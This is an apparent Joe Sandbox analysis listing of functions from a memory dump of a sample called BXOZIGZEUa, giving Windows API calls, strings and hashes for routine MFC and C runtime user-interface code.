Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID:
String ID: H_$h_
API String ID: 0-294143393
Opcode ID: 7670805eb46c32fdf877c339dfb021e6920123c390aba523585a8e26bd413e1e
Instruction ID: 15ac8ba212aae06da1da153c6c1a2180b5ee5b91b62c386a00137061ffe87997
Opcode Fuzzy Hash: 7670805eb46c32fdf877c339dfb021e6920123c390aba523585a8e26bd413e1e
Instruction Fuzzy Hash: 57418231300205ABEB258F15C88AFBE7BA6BF85710F384969F95ACB2D0DB75DC418B51

Function 0051088F Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

BringWindowToTop.USER32(00000000), ref: 005109BC
BringWindowToTop.USER32(00000000), ref: 005109C4

Part of subcall function 004ECBFE: GetWindowLongW.USER32(?,000000F0), ref: 004ECC09

Part of subcall function 004ECD55: ShowWindow.USER32(00000000,?,?,004DC2F5,00000000,00000000,00000363,00000001,00000000,00000001,00000001,?,00000000,00000363,00000001,00000000), ref: 004ECD66

Strings

X`, xrefs: 005108C7

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Window$Bring$LongShow
String ID: X`
API String ID: 1322630393-2458266361
Opcode ID: c0c95ad07dfe0c18add5dfc30f8a281ba97007502a7f1aae339b65a94de09efb
Instruction ID: d6ab475240858a796bd4bd5086b2ae51672343cad2601ee9b34bdeb33257b584
Opcode Fuzzy Hash: c0c95ad07dfe0c18add5dfc30f8a281ba97007502a7f1aae339b65a94de09efb
Instruction Fuzzy Hash: EC416D71B00205AFEB149BA5C855FBEBBB5FF48710F11006AF905EB2D1DB7598818B94

Function 004F37ED Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 004F385C
SystemParametersInfoW.USER32(00000026,00000000,?,00000000), ref: 004F38F9

Strings

, xrefs: 004F3887

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: InfoParametersRectSystemWindow
String ID:
API String ID: 85510744-3916222277
Opcode ID: e5ed01bdb8f8ce0a1173a068ae6bbe62974f3236492180672ffebe3dd7063eed
Instruction ID: 2dfaecd710e98ff99a377eca256a36b3e53f03b9c5b3b2e2e5e74b76873928a2
Opcode Fuzzy Hash: e5ed01bdb8f8ce0a1173a068ae6bbe62974f3236492180672ffebe3dd7063eed
Instruction Fuzzy Hash: 97411C71A00608DFCB25DF65C888AEFBBF5FF88351F10842EE95AA6250DB755A80CF54

Function 004D7540 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 004D75B5
_memmove.LIBCMT ref: 004D7606

Part of subcall function 004D7450: std::_Xinvalid_argument.LIBCPMT ref: 004D746A

Strings

string too long, xrefs: 004D75B0

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Xinvalid_argumentstd::_$_memmove
String ID: string too long
API String ID: 2168136238-2556327735
Opcode ID: d186ba1c1ae6170e52bd3b0cd9c23a2f73132922dc3d666556cbe4465b0987f7
Instruction ID: 6cd3691ae0c56ceda8ce6ca05ccd436ce4038324114a86038fbaf0ca31c57cc0
Opcode Fuzzy Hash: d186ba1c1ae6170e52bd3b0cd9c23a2f73132922dc3d666556cbe4465b0987f7
Instruction Fuzzy Hash: 913109323086106BD7249E5CB8A092BF7E9EF92724B20492FF445C7B41E765DC4083A9

Function 00550AD5 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 102COMMON

Download Yara Rule

APIs

LoadCursorW.USER32(00000000,00007F00), ref: 00550B15
GetClientRect.USER32(?,?), ref: 00550B5E

Part of subcall function 004DACFF: __CxxThrowException@8.LIBCMT ref: 004DAD15
Part of subcall function 004DACFF: __EH_prolog3.LIBCMT ref: 004DAD22

Part of subcall function 004EAB9B: GetParent.USER32(?), ref: 004EABA5

Strings

\md, xrefs: 00550B27

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ClientCursorException@8H_prolog3LoadParentRectThrow
String ID: \md
API String ID: 1072971926-7061101
Opcode ID: f42a4b79765483d7d17a1d598b9e49beb2cf2c406b7bd7ca214caf0b6aede0ae
Instruction ID: 96bf9b64154b65006a8724bff47305eb01a1819628ffedcee37046246fed818c
Opcode Fuzzy Hash: f42a4b79765483d7d17a1d598b9e49beb2cf2c406b7bd7ca214caf0b6aede0ae
Instruction Fuzzy Hash: F1311EB1A002059FCB50EFA5C891BBEBBF9FF48315F10442FF516E7281DA74A9448B65

Function 004D6CD0 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 100COMMON

Download Yara Rule

APIs

_localeconv.LIBCMT ref: 004D6CFE

Part of subcall function 005CE0ED: __getptd.LIBCMT ref: 005CE0ED

Part of subcall function 005E8CA9: ____lc_handle_func.LIBCMT ref: 005E8CAC
Part of subcall function 005E8CA9: ____lc_codepage_func.LIBCMT ref: 005E8CB4

Strings

false, xrefs: 004D6D4B
true, xrefs: 004D6D7B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ____lc_codepage_func____lc_handle_func__getptd_localeconv
String ID: false$true
API String ID: 679402580-2658103896
Opcode ID: 3af01bbf6b343e437b21965cc733e9e63ed6285e3b06820147f70884b4ee4884
Instruction ID: b2a0ae684e6368837d9c04532c6e3b83350011896fc8855225dfadea789c070d
Opcode Fuzzy Hash: 3af01bbf6b343e437b21965cc733e9e63ed6285e3b06820147f70884b4ee4884
Instruction Fuzzy Hash: 33317AB1A017C18FC710DF75A481766BFE5FB86300F2445BFD5AA8B302EA7599098B72

Function 0050A201 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0050A262
GetClientRect.USER32(?,?), ref: 0050A26F

Strings

c, xrefs: 0050A22F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$ClientWindow
String ID: c
API String ID: 23228050-2927717585
Opcode ID: 9bf905923aee0a781edfee21d0807a37a6937fcd5a80fe24adfbeb4110b80575
Instruction ID: 005de32a4165e8a00003148a955cfd11d41d516cbe0393ff8e948fa77b446a2e
Opcode Fuzzy Hash: 9bf905923aee0a781edfee21d0807a37a6937fcd5a80fe24adfbeb4110b80575
Instruction Fuzzy Hash: 8641E271A00609DFCB11DFA9C984AEEFBF9FF88300F14056AE156E3250DB716940DB65

Function 00506458 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 97COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0050645F

Part of subcall function 004E00D5: MoveToEx.GDI32(?,?,?,?), ref: 004E00FF
Part of subcall function 004E00D5: MoveToEx.GDI32(?,?,?,?), ref: 004E0110

Part of subcall function 004DFB68: MoveToEx.GDI32(?,?,?,00000000), ref: 004DFB85
Part of subcall function 004DFB68: LineTo.GDI32(?,?,?), ref: 004DFB94

Part of subcall function 004E06C9: SelectObject.GDI32(?,00000000), ref: 004E06EF
Part of subcall function 004E06C9: SelectObject.GDI32(?,?), ref: 004E0705

Strings

iii, xrefs: 00506481
iii, xrefs: 0050648E

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Move$ObjectSelect$H_prolog3Line
String ID: iii$iii
API String ID: 3726201289-3499908146
Opcode ID: 3cc78c8949d5b0a745599dca76a06de8be45f999bd33b896ba07f999f102eb96
Instruction ID: beaf22f1e0a21ef03200a3d95d0eef95d0118a065e43927da9582931d764a9de
Opcode Fuzzy Hash: 3cc78c8949d5b0a745599dca76a06de8be45f999bd33b896ba07f999f102eb96
Instruction Fuzzy Hash: E231A175A0014AEFCF01EFA5C852EEE3B76BF08704F00401AF911A7291CB749E25CB69

Function 0054CBBE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 83COMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0054CBD6
GetWindowRect.USER32(?,?), ref: 0054CC26

Strings

To`, xrefs: 0054CBE3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: ParentRectWindow
String ID: To`
API String ID: 2562589006-992168270
Opcode ID: 4e2c0c6b1f811aa5128a5e6842c79076485718d65b8fb03078d23b48064e68c9
Instruction ID: 313c82b72907c9aff2682393ec38112059b2bf311e3b0196a560e4d2b3b441ca
Opcode Fuzzy Hash: 4e2c0c6b1f811aa5128a5e6842c79076485718d65b8fb03078d23b48064e68c9
Instruction Fuzzy Hash: EF216D71A01209AFCB14DFA5C889DBFBBB9FF88304F10406EE51AA7240CB346D01CBA5

Function 005B29DC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 81COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 005B2A1F

Strings

4yZ, xrefs: 005B2AA2
4yZ, xrefs: 005B29E3

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: _wcslen
String ID: 4yZ$4yZ
API String ID: 176396367-3871332908
Opcode ID: 8d9d0585275515b6b8752dac7c594bb602b68465ebc120bb42d6c3bc9616b8f2
Instruction ID: b722c6a9f291d89ded7bf3a2b3fef12f06f317471036e99529087a2fd848615c
Opcode Fuzzy Hash: 8d9d0585275515b6b8752dac7c594bb602b68465ebc120bb42d6c3bc9616b8f2
Instruction Fuzzy Hash: 4E210732900216DBCB349F68C8426FA7BB5FF517A0F198469E8469B190E3B4FE85D360

Function 004FC492 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 004FC499
SetRectEmpty.USER32(?), ref: 004FC529

Strings

Afx:ToolBar, xrefs: 004FC52F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: EmptyH_prolog3_Rect
String ID: Afx:ToolBar
API String ID: 2941628838-177727192
Opcode ID: 18bb6c6e35354f220ec4a30ca436d98b35f2adaff36e31e97cfab298748cfc48
Instruction ID: b5a5bc9d0c5e5e706e3b9959d4c8ddfd6974994a7376df4f35f9705b886ef4e3
Opcode Fuzzy Hash: 18bb6c6e35354f220ec4a30ca436d98b35f2adaff36e31e97cfab298748cfc48
Instruction Fuzzy Hash: FE218B71A5021E9FCF04DFB4C996AEE7AA5FF48354F04052AF515E7281DB3899048BA4

Function 0050B0A6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0050B0E3
SetRect.USER32(?,?,?,?,?), ref: 0050B127

Strings

c, xrefs: 0050B14B

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: Rect$Window
String ID: c
API String ID: 924285169-2927717585
Opcode ID: 6cdd1cfdc628a1f4622d98c8e798da3652668935587eb1f0f4ad251938285a7a
Instruction ID: 1b569142811442854ce0ed02441218f67371166d744372e4f1b9c959e20afd43
Opcode Fuzzy Hash: 6cdd1cfdc628a1f4622d98c8e798da3652668935587eb1f0f4ad251938285a7a
Instruction Fuzzy Hash: A931ECB0E002089FDB10CFA9C984AAEFBF9FF98304B10855EE556E3255D774A904CFA0

Function 0058444B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00584452
IsWindow.USER32(?), ref: 00584468

Strings

83`, xrefs: 00584497

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3Window
String ID: 83`
API String ID: 616115145-1826646354
Opcode ID: cd53cd9544a14d90c28a9336ed077c8a5b93aaebb934624b3001ec7b0501b341
Instruction ID: 127da561b8b8bf950a244246d728d8af4e77c314372a0a89a30383e2b7debfd9
Opcode Fuzzy Hash: cd53cd9544a14d90c28a9336ed077c8a5b93aaebb934624b3001ec7b0501b341
Instruction Fuzzy Hash: BD21D830600612DFCF04BB658819ABDBFA5BF88700F00005EE901AB2A1DF345B018BD5

Function 0050CB53 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 74COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 0050CB5A

Part of subcall function 004ECC18: GetWindowLongW.USER32(?,000000EC), ref: 004ECC23

Strings

c, xrefs: 0050CBFF
Afx:MiniFrame, xrefs: 0050CB8F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3LongWindow
String ID: Afx:MiniFrame$c
API String ID: 92005281-2406227893
Opcode ID: d7db4713114ff2425c7a464fab694859c4c4201077deba36701b5fd8d14183da
Instruction ID: a8502f6697c48d9478eb25861b5713c18c5bfe1cb49c5f2f060c54f5073f2761
Opcode Fuzzy Hash: d7db4713114ff2425c7a464fab694859c4c4201077deba36701b5fd8d14183da
Instruction Fuzzy Hash: 6C21B0312006059BDB149F72C856BAE3EA5FF86310F14062DB917C72D1EB34D911C794

Function 005BA11A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 73COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005BA121

Part of subcall function 005A7DE9: __EH_prolog3.LIBCMT ref: 005A7DF0

Strings

dF`, xrefs: 005BA1B0
X*b, xrefs: 005BA228

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: X*b$dF`
API String ID: 431132790-1133291677
Opcode ID: 4340fbfc967da84c816dc3f2ac8328eb33438b4e74315e58675ae93a3e96ea0f
Instruction ID: 1b214e1eb6136fb6a15ecd5d03eb7c97690bca78141f3e5ca9e643a7da5e5404
Opcode Fuzzy Hash: 4340fbfc967da84c816dc3f2ac8328eb33438b4e74315e58675ae93a3e96ea0f
Instruction Fuzzy Hash: 5E3170B4405B85DED725EB75C5157EABBE0AF61319F10484EE19B132C2CF782708CB6A

Function 004FE41F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 004FE426

Part of subcall function 0055EBDB: __EH_prolog3.LIBCMT ref: 0055EBE2

Part of subcall function 0055E8FE: __EH_prolog3.LIBCMT ref: 0055E905

Strings

LargeIcons, xrefs: 004FE4C7
%sMFCToolBarParameters, xrefs: 004FE459

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078157490.0000000000676000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078173152.0000000000677000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4d0000_BXOZIGZEUa.jbxd

Similarity

API ID: H_prolog3
String ID: %sMFCToolBarParameters$LargeIcons
API String ID: 431132790-2076908790
Opcode ID: 68490d7cbc9dd1f2f150532108f872d88fba8ca6af78e42a89ee67cf296913aa
Instruction ID: ff9f37094b264e897a575e55abadb0805004a9c6074f50ef2d3973a5c9e74e89
Opcode Fuzzy Hash: 68490d7cbc9dd1f2f150532108f872d88fba8ca6af78e42a89ee67cf296913aa
Instruction Fuzzy Hash: 0921C570A00209DFCB15DFA5C856EBEBFB1BF84318F14005EF5069B392DA759A44C795

Function 005B646F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 005B6476

Part of subcall function 005A4024: __EH_prolog3.LIBCMT ref: 005A402B

Part of subcall function 005B4C7F: __EH_prolog3.LIBCMT ref: 005B4C86
Part of subcall function 005B4C7F: SetRectEmpty.USER32(?), ref: 005B4D3B
Part of subcall function 005B4C7F: CreateCompatibleDC.GDI32(00000000), ref: 005B4D3E
Part of subcall function 005B4C7F: SetRectEmpty.USER32(?), ref: 005B4D5D
Part of subcall function 005B4C7F: CreatePen.GDI32(00000000,00000001,?), ref: 005B4D68

Part of subcall function 004FE54D: __EH_prolog3.LIBCMT ref: 004FE554
Part of subcall function 004FE54D: SetRectEmpty.USER32(?), ref: 004FE70B

GetObjectW.GDI32(00000005,00000018,?), ref: 005B6564

Strings

|ra, xrefs: 005B654F

Memory Dump Source

Source File: 00000000.00000002.2077935096.00000000004D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true

Associated: 00000000.00000002.2077902542.00000000004D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078044849.00000000005F8000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.000000000063D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078091900.0000000000645000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2078132660.000000000064B000.00000002.00000001.01000000.00000003.sdmpDownload File
